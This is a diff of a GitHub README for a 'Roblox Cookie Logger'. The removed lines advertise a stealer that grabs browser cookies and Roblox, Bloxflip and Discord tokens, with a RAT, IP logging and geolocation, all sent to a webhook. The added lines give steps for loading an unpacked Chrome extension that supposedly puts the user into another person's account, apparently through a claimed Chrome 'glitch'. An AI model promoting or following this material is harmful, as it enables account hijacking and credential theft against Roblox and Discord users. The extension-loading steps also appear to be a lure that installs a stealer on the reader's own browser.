zbenntt/Roblox-Cookie-LoggerV3/README.md

-# This Is The Best Free Cookie Logger That Uses A NEW Glitch In Chrome/Google
+# This Is The Best Free Cookie Logger That Uses A NEW Glitch In Chrome/Google (Only Works On Windows)

 ![download](https://user-images.githubusercontent.com/108227869/177584583-e468fb2a-d8c8-4cf8-9d26-0fbc75e3bc6c.gif)

 • Make Sure You Install Chrome/Google Either Of Them Work

 # STEPS👣 BELOW

-Make Sure You Download These Requirments
-•
+• Download Folder As ZIP
-After Installing The Requirments Go To Download
-Then Once Downloaded Run Open Beam.py

-# Features 🛡️
-1; Roblox Cookie Logger

-2; Bloxflip Token Logger And RAT

-2; Roblox Info Such As Roblox Friends, Followers, Username And Gamepasses All Sent To Webhook

-# Extra Features 🛡️🛡️

-1; Discord Token Logger

-2; Ip Logger

-3; Geolocation (Its Like The Ip Logger But Its Precise To Where It Was Opened)
+• Locate The ZIP Folder And Unzip It.

+• Open Chrome/Google And Go To The Extensions Settings (Not The Store).

+• Make Sure Developer Mode Is Switched ON.

+• Click Load Unpacked Choose The Folder.

+• And You Should See The Extension.

+• Go To Somebodys Profile And Click The Extension You Will See A Gui That Has A Button Which Says REPLACE Click It And Wait Around 2 Minutes It Should Be Done.

+• Refresh The Page And Your In Their Account.

 # What It Does
-Its a simple gui i made that creates a stub and it steals anybodys chrome, firefox, opera cookies